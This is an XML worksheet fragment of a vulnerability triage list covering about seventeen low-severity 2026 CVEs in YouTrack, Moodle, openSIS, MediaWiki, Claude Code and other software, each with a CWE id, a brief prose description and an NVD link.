          <t>CWE-918</t>
        </is>
      </c>
      <c r="S566" s="5" t="inlineStr">
        <is>
          <t>An authenticated administrator on a node with an optional, separately licensed gateway role enabled could supply a connector URL that the server retrieved without sufficient validation of its scheme or destination, causing the server to issue requests to internal network services. Exploitation requires the licensed gateway role to be active.</t>
        </is>
      </c>
      <c r="T566" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102138</t>
        </is>
      </c>
    </row>
    <row r="567">
      <c r="A567" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B567" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C567" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100280</t>
        </is>
      </c>
      <c r="D567" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E567" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F567" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G567" s="5" t="inlineStr"/>
      <c r="H567" s="5" t="inlineStr"/>
      <c r="I567" s="5" t="inlineStr"/>
      <c r="J567" s="5" t="inlineStr"/>
      <c r="K567" s="5" t="inlineStr"/>
      <c r="L567" s="5" t="inlineStr"/>
      <c r="M567" s="5" t="inlineStr"/>
      <c r="N567" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O567" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P567" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q567" s="5" t="inlineStr"/>
      <c r="R567" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S567" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.19197 creating a project from an unreadable custom template was possible</t>
        </is>
      </c>
      <c r="T567" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100280</t>
        </is>
      </c>
    </row>
    <row r="568">
      <c r="A568" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B568" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C568" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100264</t>
        </is>
      </c>
      <c r="D568" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E568" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F568" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G568" s="5" t="inlineStr"/>
      <c r="H568" s="5" t="inlineStr"/>
      <c r="I568" s="5" t="inlineStr"/>
      <c r="J568" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K568" s="5" t="inlineStr"/>
      <c r="L568" s="5" t="inlineStr"/>
      <c r="M568" s="5" t="inlineStr"/>
      <c r="N568" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O568" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P568" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q568" s="5" t="inlineStr"/>
      <c r="R568" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="S568" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18991 stored SMTP server credentials could be disclosed by changing the server host</t>
        </is>
      </c>
      <c r="T568" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100264</t>
        </is>
      </c>
    </row>
    <row r="569">
      <c r="A569" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B569" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C569" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100271</t>
        </is>
      </c>
      <c r="D569" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E569" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F569" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G569" s="5" t="inlineStr"/>
      <c r="H569" s="5" t="inlineStr"/>
      <c r="I569" s="5" t="inlineStr"/>
      <c r="J569" s="5" t="inlineStr"/>
      <c r="K569" s="5" t="inlineStr"/>
      <c r="L569" s="5" t="inlineStr"/>
      <c r="M569" s="5" t="inlineStr"/>
      <c r="N569" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O569" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P569" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q569" s="5" t="inlineStr"/>
      <c r="R569" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S569" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.19197 missing authorisation on several endpoints allowed authenticated users to access information from other projects</t>
        </is>
      </c>
      <c r="T569" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100271</t>
        </is>
      </c>
    </row>
    <row r="570">
      <c r="A570" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B570" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C570" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102583</t>
        </is>
      </c>
      <c r="D570" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E570" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F570" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G570" s="5" t="inlineStr"/>
      <c r="H570" s="5" t="inlineStr"/>
      <c r="I570" s="5" t="inlineStr"/>
      <c r="J570" s="5" t="inlineStr"/>
      <c r="K570" s="5" t="inlineStr"/>
      <c r="L570" s="5" t="inlineStr"/>
      <c r="M570" s="5" t="inlineStr"/>
      <c r="N570" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O570" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P570" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q570" s="5" t="inlineStr"/>
      <c r="R570" s="5" t="inlineStr">
        <is>
          <t>CWE-425</t>
        </is>
      </c>
      <c r="S570" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Moodle. An incorrect capability check in the artificial intelligence (AI) editor placement's image generation web service allows an authenticated user to invoke the feature without holding the required capability. This flaw permits unauthorized users to access and utilize the AI image generation functionality.</t>
        </is>
      </c>
      <c r="T570" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102583</t>
        </is>
      </c>
    </row>
    <row r="571">
      <c r="A571" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B571" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C571" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102587</t>
        </is>
      </c>
      <c r="D571" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E571" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F571" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G571" s="5" t="inlineStr"/>
      <c r="H571" s="5" t="inlineStr"/>
      <c r="I571" s="5" t="inlineStr"/>
      <c r="J571" s="5" t="inlineStr"/>
      <c r="K571" s="5" t="inlineStr"/>
      <c r="L571" s="5" t="inlineStr"/>
      <c r="M571" s="5" t="inlineStr"/>
      <c r="N571" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O571" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P571" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q571" s="5" t="inlineStr"/>
      <c r="R571" s="5" t="inlineStr">
        <is>
          <t>CWE-204</t>
        </is>
      </c>
      <c r="S571" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Moodle. User list filters do not properly enforce visibility restrictions on user profile fields. An authorized user with manager privileges can filter user lists using profile attributes they are not permitted to view directly, resulting in unauthorized information disclosure by inferring hidden user data.</t>
        </is>
      </c>
      <c r="T571" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102587</t>
        </is>
      </c>
    </row>
    <row r="572">
      <c r="A572" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B572" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C572" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27085</t>
        </is>
      </c>
      <c r="D572" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E572" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F572" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G572" s="5" t="inlineStr"/>
      <c r="H572" s="5" t="inlineStr"/>
      <c r="I572" s="5" t="inlineStr"/>
      <c r="J572" s="5" t="inlineStr"/>
      <c r="K572" s="5" t="inlineStr"/>
      <c r="L572" s="5" t="inlineStr"/>
      <c r="M572" s="5" t="inlineStr"/>
      <c r="N572" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O572" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P572" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q572" s="5" t="inlineStr"/>
      <c r="R572" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="S572" s="5" t="inlineStr">
        <is>
          <t>Shop manager Content Injection in Astra WordPress Theme &lt;= 4.13.12 versions.</t>
        </is>
      </c>
      <c r="T572" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27085</t>
        </is>
      </c>
    </row>
    <row r="573">
      <c r="A573" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B573" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C573" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102580</t>
        </is>
      </c>
      <c r="D573" s="5" t="n">
        <v>2.2</v>
      </c>
      <c r="E573" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F573" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G573" s="5" t="inlineStr"/>
      <c r="H573" s="5" t="inlineStr"/>
      <c r="I573" s="5" t="inlineStr"/>
      <c r="J573" s="5" t="inlineStr"/>
      <c r="K573" s="5" t="inlineStr"/>
      <c r="L573" s="5" t="inlineStr"/>
      <c r="M573" s="5" t="inlineStr"/>
      <c r="N573" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O573" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P573" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q573" s="5" t="inlineStr"/>
      <c r="R573" s="5" t="inlineStr">
        <is>
          <t>CWE-470</t>
        </is>
      </c>
      <c r="S573" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Moodle. An authenticated attacker can supply an improperly validated audience class name to the Report Builder component, allowing arbitrary class instantiation. This vulnerability enables the unauthorized creation of internal program objects, which may result in unexpected application behavior.</t>
        </is>
      </c>
      <c r="T573" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102580</t>
        </is>
      </c>
    </row>
    <row r="574">
      <c r="A574" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B574" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C574" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102582</t>
        </is>
      </c>
      <c r="D574" s="5" t="n">
        <v>2.2</v>
      </c>
      <c r="E574" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F574" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G574" s="5" t="inlineStr"/>
      <c r="H574" s="5" t="inlineStr"/>
      <c r="I574" s="5" t="inlineStr"/>
      <c r="J574" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K574" s="5" t="inlineStr"/>
      <c r="L574" s="5" t="inlineStr"/>
      <c r="M574" s="5" t="inlineStr"/>
      <c r="N574" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O574" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P574" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q574" s="5" t="inlineStr"/>
      <c r="R574" s="5" t="inlineStr">
        <is>
          <t>CWE-425</t>
        </is>
      </c>
      <c r="S574" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Moodle. The manual enrolment management page did not properly check whether the manual enrolment plugin was disabled, allowing users with enrolment permissions to access the page directly by navigating to its URL. Consequently, an authorized user could manage manual enrolments even after an administrator disabled the feature in the user interface.</t>
        </is>
      </c>
      <c r="T574" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102582</t>
        </is>
      </c>
    </row>
    <row r="575">
      <c r="A575" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B575" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C575" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103114</t>
        </is>
      </c>
      <c r="D575" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E575" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F575" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G575" s="5" t="inlineStr"/>
      <c r="H575" s="5" t="inlineStr"/>
      <c r="I575" s="5" t="inlineStr"/>
      <c r="J575" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K575" s="5" t="inlineStr"/>
      <c r="L575" s="5" t="inlineStr"/>
      <c r="M575" s="5" t="inlineStr"/>
      <c r="N575" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O575" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P575" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q575" s="5" t="inlineStr"/>
      <c r="R575" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S575" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in OS4ED openSIS-Classic up to 9.3. The impacted element is the function DBQuery_assignment of the file modules/grades/Assignments.php of the component Assignment Management Endpoint. The manipulation of the argument Tables leads to sql injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T575" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103114</t>
        </is>
      </c>
    </row>
    <row r="576">
      <c r="A576" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B576" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C576" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103116</t>
        </is>
      </c>
      <c r="D576" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E576" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F576" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G576" s="5" t="inlineStr"/>
      <c r="H576" s="5" t="inlineStr"/>
      <c r="I576" s="5" t="inlineStr"/>
      <c r="J576" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K576" s="5" t="inlineStr"/>
      <c r="L576" s="5" t="inlineStr"/>
      <c r="M576" s="5" t="inlineStr"/>
      <c r="N576" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O576" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P576" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q576" s="5" t="inlineStr"/>
      <c r="R576" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S576" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in OS4ED openSIS-Classic up to 9.3. This impacts the function DBQuery of the file functions/GetStuListFnc.php of the component Student List Search Endpoint. This manipulation of the argument LO_sort causes sql injection. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T576" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103116</t>
        </is>
      </c>
    </row>
    <row r="577">
      <c r="A577" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B577" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C577" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103233</t>
        </is>
      </c>
      <c r="D577" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E577" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F577" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G577" s="5" t="inlineStr"/>
      <c r="H577" s="5" t="inlineStr"/>
      <c r="I577" s="5" t="inlineStr"/>
      <c r="J577" s="5" t="inlineStr"/>
      <c r="K577" s="5" t="inlineStr"/>
      <c r="L577" s="5" t="inlineStr"/>
      <c r="M577" s="5" t="inlineStr"/>
      <c r="N577" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O577" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P577" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q577" s="5" t="inlineStr"/>
      <c r="R577" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="S577" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in AdithyaYelloju Restaurant-Management-System up to 7f0e7e84255e8fcfd488e83f8f91451bbbff6b9c. This impacts an unknown function of the file /admin/ of the component Admin Area. Such manipulation of the argument ID leads to authorization bypass. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T577" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103233</t>
        </is>
      </c>
    </row>
    <row r="578">
      <c r="A578" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B578" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C578" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103012</t>
        </is>
      </c>
      <c r="D578" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E578" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F578" s="5" t="inlineStr">
        <is>
          <t>98a01053-8a31-4f6d-9aa9-252be161adc6</t>
        </is>
      </c>
      <c r="G578" s="5" t="inlineStr"/>
      <c r="H578" s="5" t="inlineStr"/>
      <c r="I578" s="5" t="inlineStr"/>
      <c r="J578" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K578" s="5" t="inlineStr"/>
      <c r="L578" s="5" t="inlineStr"/>
      <c r="M578" s="5" t="inlineStr"/>
      <c r="N578" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O578" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P578" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q578" s="5" t="inlineStr"/>
      <c r="R578" s="5" t="inlineStr">
        <is>
          <t>CWE-696</t>
        </is>
      </c>
      <c r="S578" s="5" t="inlineStr">
        <is>
          <t>Claude Code selected an API key stored by Claude Code, for example from an earlier `/login` or written directly to its configuration, ahead of the user's valid Claude Enterprise or Team sign-in when fetching the organization's server-managed settings, even though the session itself authenticated with the Enterprise or Team account. When the settings endpoint rejected that stored key, the session started without the organization's server-managed policy (such as permission deny rules, model restrictions and managed-only locks) or, if a previously cached copy existed on the machine, kept applying that stale copy without receiving later policy changes — while continuing to operate as the organization's account. Triggering this required local access to a device with such a stored API key; the no-policy case additionally required that no managed settings had previously been cached. Endpoint-managed (MDM or file-based) settings were not affected. Claude for Enterprise organizations were affected from version 2.0.68; Claude for Work (Team) organizations from version 2.1.38, when server-managed settings became available to them.
Users on standard Claude Code auto-update have received this fix already. Users performing manual updates are advised to update to version 2.1.260 or later.
Thank you to Tamas Voros / NVIDIA AI Red Team for reporting this issue.</t>
        </is>
      </c>
      <c r="T578" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103012</t>
        </is>
      </c>
    </row>
    <row r="579">
      <c r="A579" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B579" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C579" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103113</t>
        </is>
      </c>
      <c r="D579" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E579" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F579" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G579" s="5" t="inlineStr"/>
      <c r="H579" s="5" t="inlineStr"/>
      <c r="I579" s="5" t="inlineStr"/>
      <c r="J579" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K579" s="5" t="inlineStr"/>
      <c r="L579" s="5" t="inlineStr"/>
      <c r="M579" s="5" t="inlineStr"/>
      <c r="N579" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O579" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P579" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q579" s="5" t="inlineStr"/>
      <c r="R579" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S579" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in OS4ED openSIS-Classic up to 9.3. The affected element is the function save action of the file modules/students/Student.php of the component General Information Tab. Executing a manipulation of the argument students can lead to sql injection. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T579" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103113</t>
        </is>
      </c>
    </row>
    <row r="580">
      <c r="A580" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B580" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C580" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103117</t>
        </is>
      </c>
      <c r="D580" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E580" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F580" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G580" s="5" t="inlineStr"/>
      <c r="H580" s="5" t="inlineStr"/>
      <c r="I580" s="5" t="inlineStr"/>
      <c r="J580" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K580" s="5" t="inlineStr"/>
      <c r="L580" s="5" t="inlineStr"/>
      <c r="M580" s="5" t="inlineStr"/>
      <c r="N580" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O580" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P580" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q580" s="5" t="inlineStr"/>
      <c r="R580" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S580" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in OS4ED openSIS-Classic up to 9.3. Affected is the function db_properties of the file functions/DatabaseInc.php of the component Save Data Handler. Such manipulation of the argument values leads to sql injection. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T580" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103117</t>
        </is>
      </c>
    </row>
    <row r="581">
      <c r="A581" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B581" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C581" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76144</t>
        </is>
      </c>
      <c r="D581" s="5" t="n">
        <v>1.8</v>
      </c>
      <c r="E581" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F581" s="5" t="inlineStr">
        <is>
          <t>vuln@krcert.or.kr</t>
        </is>
      </c>
      <c r="G581" s="5" t="inlineStr"/>
      <c r="H581" s="5" t="inlineStr"/>
      <c r="I581" s="5" t="inlineStr"/>
      <c r="J581" s="5" t="inlineStr"/>
      <c r="K581" s="5" t="inlineStr"/>
      <c r="L581" s="5" t="inlineStr"/>
      <c r="M581" s="5" t="inlineStr"/>
      <c r="N581" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O581" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P581" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q581" s="5" t="inlineStr"/>
      <c r="R581" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S581" s="5" t="inlineStr">
        <is>
          <t>An unrestricted file upload vulnerability caused by insufficient file extension and integrity verification in Genian SSL PNS allows an attacker to upload a dangerous file that is not an official patch</t>
        </is>
      </c>
      <c r="T581" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76144</t>
        </is>
      </c>
    </row>
    <row r="582">
      <c r="A582" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B582" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C582" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103440</t>
        </is>
      </c>
      <c r="D582" s="5" t="n">
        <v>1.2</v>
      </c>
      <c r="E582" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F582" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G582" s="5" t="inlineStr"/>
      <c r="H582" s="5" t="inlineStr"/>
      <c r="I582" s="5" t="inlineStr"/>
      <c r="J582" s="5" t="inlineStr"/>
      <c r="K582" s="5" t="inlineStr"/>
      <c r="L582" s="5" t="inlineStr"/>
      <c r="M582" s="5" t="inlineStr"/>
      <c r="N582" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O582" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P582" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q582" s="5" t="inlineStr"/>
      <c r="R582" s="5" t="inlineStr">
        <is>
          <t>CWE-202</t>
        </is>
      </c>
      <c r="S582" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive information through data queries vulnerability in The Wikimedia Foundation MediaWiki PageTriage extension allows Information Elicitation.
This issue affects MediaWiki PageTriage extension: 1.46, 1.45, and 1.43.</t>
        </is>
      </c>
